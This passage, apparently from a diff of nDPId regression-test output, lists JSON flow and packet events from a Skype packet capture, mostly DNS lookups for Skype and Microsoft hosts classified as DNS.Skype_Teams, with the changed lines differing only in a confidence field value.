{"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1431970634431,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970634431,"pkt":"0NQSxnP1PBXCt3IOCABFAABDXEcAAEARmu\/AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1431970634432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970634432,"pkt":"0NQSxnP1PBXCt3IOCABFAABDrh8AAEARSRfAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1431970634589,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970634589,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7UlwAAEARpOLAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1431970634591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970634591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA75y8AAEAREA\/AqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431970634648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1431970634648,"pkt":"0NQSxnP1PBXCt3IOCABFAABCEa4AAEAR5YnAqAEiwKgBAe5YADUALntuuqkBAAABAAAAAAAABGFwcHMLc2t5cGVhc3NldHMDY29tAAABAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"apps.skypeassets.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"apps.skypeassets.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431970634669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431970634669,"pkt":"0NQSxnP1PBXCt3IOCABFAABXFu0AAEAR4DXAqAEiwKgBAeFeADUAQ\/HxjTUBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431970634723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431970634723,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA14V4AhKxSjTWBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAAbhADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/L\/oAAEARx0DAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/lFMAAEARYufAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 